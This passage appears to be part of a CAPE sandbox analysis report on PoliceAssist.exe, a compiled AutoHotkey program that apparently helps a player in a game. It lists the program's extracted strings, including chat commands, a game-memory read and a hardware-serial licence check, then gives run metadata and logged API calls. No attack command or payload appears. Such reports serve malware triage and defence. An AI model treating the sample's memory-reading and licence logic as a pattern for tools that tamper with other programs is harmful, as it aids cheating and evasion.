"WebRequest := ComObjCreate(\"WinHttp.WinHttpRequest.5.1\")", "|$HI;", "t$t@2", "A\\_^][", "@A^A]A\\", "Hc}Dt", "CtrlBreak", "uE", "EnterCriticalSection", "Not allowed as an output variable.", "DetectHiddenWindows", ".{Enter}", "L;t$xrKH", "WaNd?", "GetUpdateRect", "t]@8k", "\\$HfE", "Break", "IPAddress2", "@A_A^A]A\\_", "sendchat(\"/pt \" id2)", "tBffffff", "T$ E3", "T$(E3", "CLSIDFromString", "@A_A]A\\_]", "not in", "command option was not enabled in the original script.", "Limit", "Range", "D$@A;", "GetStringTypeExW", "t.fffffff", "return 1", "MouseMoveOff", "NumpadDot", "CE;cX}6L", "Inscriptional_Parthian", "GetLastError", "u4f9E", "ntdll.dll", "GetConsoleCP", "Inherited", "SING error", "AltTabMenuDismiss", "RTrim", "O0HcQ", "IsDebuggerPresent", "IfWinActive", "]>)2X", "if !input", "LShift", "CheckRadioButton", "t\\HcCH", "UnlockServiceDatabase", "\\$T+t$p+\\$t+t$H+\\$LH", "H9{0u", "RegExmatch(hp, \"(.*)\\.\", shp)", "EndReason", "WinMinimize", "XButton1::", "CIcD$`H", "HH:mm:ss", "\\$ UATAVH", "EWHcM", "y\\PD>!", "t$ WATAUAVAWH", "StringTrimRight", "RegEnumKeyExW", "UNICODE", "LcC0H", ":uu,f", "@8w#u", "SUVWH", "D$(fD9", "A9vdu", "D$@Lc", "t%H;s", "HcD$\\", "tKfA;", "OutputDebugStringW", "+M<7>", "j?{$*", "gui, 1:add, text, cWhite vM1 x0 w250 Center, % ahk[i-2]", "GetClipBox", "First", "Carian", "TranslateAcceleratorW", "CONTROLDOWN", "GetLayeredWindowAttributes", "t$ I+", "CloseServiceHandle", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "SetWorkingDir", "CONTROLUP", "A_A^A]_]", "Tai_Le", "e+000", "FindAnywhere", "CreateIconFromResourceEx", "T$H8Z#u", "l$X@2", "kernel32", "InProgress", "`A\\][", "Reload", "SUWAUAVH", "RawSet", "Launch Error (possibly related to RunAs):", "@SVWH", "Lycian", "}/+}'C", "Select", "0A_A^A]A\\_", "L9l$p", "Gui, launcher:Show, w311 h381, WantedLab", "HeapSize", "AdjustWindowRectEx", "<$0u%", "ucirc", "SendInput {f6}^a+{del}%text%{enter}", "middot", "t\"E8|$&t", "\\p{Xwd}", "LoadResource", "MonitorPrimary", "A \"return\" must be encountered prior to this \"}\".", "\\$ VATAUH", "pA]A\\_][", "GetClipRgn", "E>nEA", "sleep 1000", "dwmapi.dll", "d$8E3", ".?AVComEvent@@", "uzKs@>", "@UATH", "POSIX named classes are supported only within a class", "Invalid option.", "|$pfD", "t%fD9?t", "<>=/|^,:", "Acirc", "MS Shell Dlg", "A_A^A\\_^][", "8A^A\\][", "`managed vector copy constructor iterator'", "9D$XufE", "hp:=GetHP()", "IcK$H", "This parameter contains a variable name missing its ending percent sign.", "A;9}+M", "H ATH", "SetTimer, apt, 1", "sc%03X", "OnMessage", "#KeyHistory 0", "t$pI;", "Ethiopic", "RegExMatch(cmd, \"(.*)start\", ogr)", "L9|$8u", "exitapp", "is not", "StrPut", "l$pL;t$`", "u@D85", "inveh() {", "H;WHr", "('8PW", "<>=/|^,:*&~!()[]{}+-?.\"", "epA_A^A]A\\_^]", "Drive", "D9%U6", "Shell_NotifyIconW", "`eh vector copy constructor iterator'", "|$pE3", "CoordModeToolTip", "GetExitCodeProcess", "Treble", "d$@E3", "(t$`I", "D8e_ue", "Gui, launcher:Add, Picture, x32 y85 w250 h220 , C:\\PA\\Logo.ico", "GetSystemDefaultUILanguage", "erroffset passed as NULL", "Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.", "](tfA", "SizeNWSE", "L$ H+", "`local vftable constructor closure'", "L$PfI", "l$`A;E s", "l$ E3", "#ClipboardTimeout", "VVVVVVV", "OriginalFilename", "REG_RESOURCE_LIST", "A9G|}", "0A]A\\_", "R6027", "D8w#u", "numbers out of order in {} quantifier", "#ErrorStdOut", "XA^[H", "D9l$l", "DefaultListView", "MenuGetName", "H9k0u", "@SVWAVH", "SUVATAUAVH", "`h````", "StringReplace", "HA_A]_^][", "if !RegExMatch(getchatline(0), \"", "t>D95", "D$0H9C0", "GetVersionExW", "DEFINE", "Media_Play_Pause", "WinActivate", "d$xL9k", "@UAUAVH", "\\c must be followed by an ASCII character", "<>=/|^,:*&~!()[]{}+-?.", "‘", "fE9<$", "D$@Hc", "ChooseString", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "LoadAcceleratorsW", "%c ", "NoTab", "E9<$t", "HcG H", "NoSort", "VWAUAVAWH", "<$+u?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~", "GetLocalTime", "`managed vector constructor iterator'", "Menu name too long.", "qS>g?h3", "v'H;s", "|$0-H", "range out of order in character class", "SetControlDelay", "KeyDelay", "Gosub", "iniread, x, rp.ini, settings, x", "\\P{Xwd}", "tA@8p#u", "REG_DWORD", ".exe.bat.com.cmd.hta", "ChangeClipboardChain", "SetStdHandle", "CreatePolygonRgn", "SetTimer, cmenu, 1", "!|$XI", "Error", "Parameter #3 must be blank in this case.", "3>fvw", "__based(", "__eabi", "Control", "H;=j@", "IsFunc", "Hanunoo", "#Persistent", "A^_^][", "WeaponId() {", "L$xfA9", "SizeNESW", "|L^\\u", "@8w#H", "fD9tN", ":uUfB", "A;\\$ r$H", "|$@-H", "L$PE3", "IsWow64Process", "https://autohotkey.com", "L9q0u", "Key := objOSItem.SerialNumber", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "A^_[]", "bp(=>?g", "A__^[", "internal error: opcode not recognized", "lic_check()", "T$ L+", "D8p(u", "0A^A]A\\_[", "if !A_IsCompiled", "StrReplace", "} ffffff", "This \"For\" is missing its \"in\".", "rHH+D$`LcM", "L$PI;", "|$0.u", "sleep 3000", "?+>^m", " A^A]_", " t?D9", "LAlt ", "SetBase", "acirc", "T$(A+", "iniread, rank, rp.ini, settings, rank", "ThisMenu", "Disable", "SHEmptyRecycleBinW", ";(uBE", "Coptic", "RETRY", "@UATAUAVAWH", "@UVATAUAWH", "VarFileInfo", "ALTUP", "G:f9C", "GdiFlush", "e`A_A^A]A\\_^]", "ComObjArray", "FindString", "IsMenu", "%04hX", "sendinput {a down}", "uYfE9", "--------------------------------------------------", "\\\" $*", "sendchat(\"/drag \" id2)", "D$ L+", "D;P(|", "FileTimeToLocalFileTime", "SetWindowTextW", "objWMIService := ComObjGet(\"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2\")", "Native", "H9k@@", "Catan", "GuiHeight", "unknown POSIX class name", "H;{0|+H", "GetProcessWindowStation", "L$8u%", "Too many status bars.", ".?AVComEnum@@", "#MaxThreadsPerHotkey", "WIN_VISTA", "x ATH", "Unexpected %", "GetDiskFreeSpaceW", "SOFTWARE\\AutoHotkey", "CHcB`H", "GetFileType", "Minimize", "<^>^!<+>+<#>#", "|$89^", "GetAncestor", "StrCmpLogicalW", "UpdateWindow", "L$fH;", "\\p{Ll}", "D$HE3", "disallowed Unicode code point (>= 0xd800 && <= 0xdfff)", "dddd, MMMM dd, yyyy", "RegCloseKey", "XA]A\\][", "Lcd$LI", "HcD$T", "u*8D$qt$D9{", "Illegal parameter name.", "..om?", "FileObject", "au`fE9J", "WinWaitActive", "WATAUH", "f9D$p", "StoreCapslockMode", "A_A]A\\_]", "0A^A\\[", "\\$ UWAVH", " A_A^A]A\\_", "Xusf9~", "WheelRight", "LoopFileDir", "This line does not contain a recognized action.", "u&8T$LD", "A8F#u", "SetNumlockState", "SysDateTimePick32", "`RTTI", "gui, launcher:font, s16", "FillRect", "„", "agun() {", "@SVWATAUAVH", "CreateDialogIndirectParamW", "T$`E3", "+-*&~!", "GetUserObjectInformationW", "Vertical", "T$PD;", "fE;)sKM", "T$xHc", ".pdata", "\\$\\E;", "%s (a %s variable%s)", "Password", "Failed to open file.", "F>qUxv", "fD;*ssI", "GetMonitorInfoW", "CharUpperW", "D\\@fA", "œ", "|$(tc", "GetProcessImageFileNameW", "v'L;c", "gui, 5:+ToolWindow -Caption +Owner +AlwaysOnTop +E0x20", "RP := RegExReplace(RP, \"\\Q$\\Efam\", fam)", "Mongolian", "PriorHotkey", "Ctrl+R", "t0D8w#u", "\\$0um3", "conditional group contains more than two branches", "sendinput {RButton down}", "Declaration conflicts with existing var.", "A^A]A\\^]", "Key History has been disabled via #KeyHistory 0.", "t$ WATAV", "Launch_Media", "Screen", "t$ D;>u", "ShowWindow", "RP := RegExReplace(RP, \"\\Q$\\Eorg\", org)", "D8l$x", "c [1>H'", "D8u:t\"H;", "Consolas", "Missing \"}\" before \":\"", "t/f93u*", "A^A\\_][", " !\"#$", "|$0E2", "Out of memory.", "<>=/|^,:*&~!()[]{}+-?.\"'\\;`", "H9\\$Ht", "N3`d?", "CoordModeCaret", "Unknown class.", "[[VVVVVVVVVVVVVVVV", "Dialog", "malformed \\P or \\p sequence", "Window", "GuiControl, 5:,pfam, ", "ControlSetText", "%0.6f", "<$,u_I", "MyDocuments", "While", "E9l$(t", "RegisterHotKey", "SoundPlay", "#MaxMem", "NotReady", "LWINDOWN", "Tab name doesn't exist yet.", "Duplicate function definition.", "9CDtJ", "upper", "t$ WATAVH", "IsAppThemed", "GetEnvironmentVariableW", "f;D$@ug", "if %s %s %s and %s", "Caption", "Nonexistent hotkey variant (IfWin).", ".?AVTextFile@@", "Variable name too long.", "DetectHiddenWindows On", "A^A]A\\^[", "InputThenPlay", "H;D$p", "tooltips_class32", "\"H958", "GetSysColorBrush", "if hud", "Logical", "qrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqr", "Illegal group name.", "SetDefaultMouseSpeed", "WIN_7", "(|$PD", "%04d%02d", "@8{#u", "RegExReplace", "SetTimer, agun, 1", "t#H", "Small", "]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]", "u[D8u", "UTF-8-RAW", "&Edit Script", "@SUWAUAVH", "u\"L9k", "FileAppend", "GetCurrentDirectoryW", " !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~", "@USVWATAUAVAWH", "StringUpper", "Monday", "Deseret", "MonitorFromPoint", "UVWATAUH", "li:=i", "Could not launch AutoHotkey.chm", "GetPrivateProfileStringW", "L$0H3", "AutoHotkey", "\"%s\" requires at least %d parameter%s.", "Status", "This line will never execute, due to %s preceding it.", "D$Ht?H", "Missing \":\"", "ScriptFullPath", "IsClipboardFormatAvailable", "t&fff", "Greek", "L$ Lc", "TabLeft", "gui, 1:hide", "[[[[[", "f9\\$ t,H", "Upper", "t#H9s", "0A]_[", "Hidden", "Can't delete menu (in use?).", "IsBuiltIn", "SendMessageW", "L$pH3", "[[[[[[", "\\p{Lu}", "‹", "ATAUAWH", "Click", "D$`I9D$", "@SUAWH", "GetWindowRect", ">AUTOHOTKEY SCRIPT<(", "A^A\\^]", "@USVWAUH", "f;E`u", "Priority", "SetActiveWindow", "GuiControlGet", "RegConnectRegistryW", "SoundSet", "opengta() {", "D$@fD", "Unexpected \"}\"", "digit", "InitialWorkingDir", "ContextMenu", ".?AV?$CKuStringT@_WVCKuStringUtilW@@@@", "CreateRectRgn", "bbbubb", "tEH;=", "fA9|$", "loop, Parse, file, `n, `r", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "SUVWATAVAWH", "AtlAxWin", "apt() {", "ATAUH", "t$Xffffff", "-------------------------------------------------------------------------------------------------------------", "A_A]_^]", "<>=/|^,:*&~!()[]{}\"", "CONTINUE", "\\$@H9", "yh:=5", "FileMove", "GetEnvironmentStringsW", "A^A]A\\^][", "T$Hfffff", "HKEY_LOCAL_MACHINE", ".?AVTextMem@@", "Gui, 3:Destroy", "H", "return prread(getprocessid(), 0xBA18FC)", "+D$$Hc", "{Text}", "@SWAUH", "#WinActivateForce", "Invalid value.", "Kaithi", "BitShiftLeft", "Hc@$H", "IPAddress4", "Max window number is 20.", "|$r:tIf9t$p", "Uncheck", "VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVWVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVXYXYTZXY[[\\]]]", "Color", "USVWATAUAVAW", "@SAWH", "L$HD+L$@", "CommDlgExtendedError", "7fD9?", "Interrupt", "GuiControl", "EditPaste", "Check3", "RegExMatch(GetChatLine(), \"", "subpattern name expected", "if (index == A_Index)", "tt", "V @8x", "SetThreadPriority", "Volume_Down", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "TimeIdleKeyboard", "CreateSolidBrush", "%s (%d) : ==> Warning: %s", "Unexpected \"{\"", "R6016" ], "cape_type_code": 0, "cape_type": "" } }, "CAPE": { "payloads": [], "configs": [] }, "info": { "version": "2.4-CAPE", "started": "2025-11-20 13:58:15", "ended": "2025-11-20 14:02:02", "duration": 227, "id": 25, "category": "file", "custom": "", "machine": { "id": 19, "status": "stopping", "name": "MalwareGuest", "label": "MalwareGuest", "platform": "windows", "manager": "Proxmox", "started_on": "2025-11-20 13:58:15", "shutdown_on": "2025-11-20 14:02:01" }, "package": "exe", "timeout": true, "tlp": null, "parent_sample": null, "options": { "interactive": "1", "nohuman": "yes" }, "source_url": null, "route": "internet", "user_id": 0, "CAPE_current_commit": "b8e0bcad685cdd750a8c54cd86745809ad1c320b" }, "behavior": { "processes": [ { "process_id": 2552, "process_name": "explorer.exe", "parent_id": 2516, "module_path": "C:\\Windows\\explorer.exe", "first_seen": "2025-11-20 10:58:16,260", "calls": [ { "timestamp": "2025-11-20 10:58:18,963", "thread_id": "3400", "caller": "0x7ffecd44e842", "parentcaller": "0x7ffee34e16e9", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000009b8" }, { "name": "DesiredAccess", "value": "0x00120089", "pretty_value": "FILE_GENERIC_READ" }, { "name": "FileName", "value": "\\Device\\Bam" }, { "name": "ShareAccess", "value": "7", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 0 }, { "timestamp": "2025-11-20 10:58:26,228", "thread_id": "2800", "caller": "0x7ffee2fb92b9", "parentcaller": "0x7ffee2ff224d", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "00000338-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 1 }, { "timestamp": "2025-11-20 10:58:26,228", "thread_id": "2996", "caller": "0x7ff736098fba", "parentcaller": "0x00000000", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "00000339-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 2 }, { "timestamp": "2025-11-20 10:58:26,228", "thread_id": "2996", "caller": "0x7ff736098fba", "parentcaller": "0x00000000", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "C2F03A33-21F5-47FA-B4BB-156362A2F239" }, { "name": "ClsContext", "value": "0x00000404", "pretty_value": "CLSCTX_LOCAL_SERVER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "6D5140C1-7436-11CE-8034-00AA006009FA" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 3 }, { "timestamp": "2025-11-20 10:58:26,291", "thread_id": "2768", "caller": "0x7ff73605c21a", "parentcaller": "0x7ff736042b6f", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B" }, { "name": "ClsContext", "value": "0x00000003", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER" }, { "name": "riid", "value": "21CBC515-2DDE-4D66-8292-BA34BD25094A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 4 }, { "timestamp": "2025-11-20 10:58:26,291", "thread_id": "2768", "caller": "0x7ff73605c285", "parentcaller": "0x7ff736042b6f", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 5 }, { "timestamp": "2025-11-20 10:58:26,291", "thread_id": "2768", "caller": "0x7ff73605c285", "parentcaller": "0x7ff736042b6f", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000015d4" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\" }, { "name": "ShareAccess", "value": "7", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 6 }, { "timestamp": "2025-11-20 10:58:26,291", "thread_id": "2768", "caller": "0x7ff736081e2d", "parentcaller": "0x7ff73603c798", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\rsaenh.dll" }, { "name": "BaseAddress", "value": "0x7ffedfb90000" } ], "repeated": 1, "id": 7 }, { "timestamp": "2025-11-20 10:58:26,291", "thread_id": "2768", "caller": "0x7ff73603dd72", "parentcaller": "0x7ff73603c5b7", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00001c74" }, { "name": "DesiredAccess", "value": "0x00100081", "pretty_value": "FILE_READ_ACCESS|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "7", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 8 }, { "timestamp": "2025-11-20 10:58:26,291", "thread_id": "2768", "caller": "0x7ff73603dd72", "parentcaller": "0x7ff73603c5b7", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00001c74" }, { "name": "DesiredAccess", "value": "0x00100081", "pretty_value": "FILE_READ_ACCESS|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Temp" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "7", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 9 }, { "timestamp": "2025-11-20 10:58:26,463", "thread_id": "2800", "caller": "0x7ffecd44e842", "parentcaller": "0x7ffee34e16e9", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000ce4" }, { "name": "DesiredAccess", "value": "0x00120089", "pretty_value": "FILE_GENERIC_READ" }, { "name": "FileName", "value": "\\Device\\Bam" }, { "name": "ShareAccess", "value": "7", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 10 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "00000323-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "00000146-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 11 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x7ffee2330000" } ], "repeated": 0, "id": 12 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000015d4" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Temp\\PoliceAssist.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 13 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0x000015d4" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00001c74" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 14 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000015d4" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Temp\\PoliceAssist.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 15 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x40000003", "arguments": [ { "name": "SectionHandle", "value": "0x000015bc" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0013a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 16 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "RegionSize", "value": "0x0013a000" } ], "repeated": 0, "id": 17 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000015d4" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Temp\\PoliceAssist.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 18 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x40000003", "arguments": [ { "name": "SectionHandle", "value": "0x000015bc" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0013a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 19 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "RegionSize", "value": "0x0013a000" } ], "repeated": 0, "id": 20 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000015d4" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Temp\\PoliceAssist.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 21 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x40000003", "arguments": [ { "name": "SectionHandle", "value": "0x000015bc" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0013a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 22 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10dc0000" }, { "name": "RegionSize", "value": "0x0013a000" } ], "repeated": 0, "id": 23 }, { "timestamp": "2025-11-20 10:58:28,400", "thread_id": "2768", "caller": "0x7ff73603ddb7", "parentcaller": "0x7ff73603c5b7", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000015d4" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Temp\\PoliceAssist.exe" 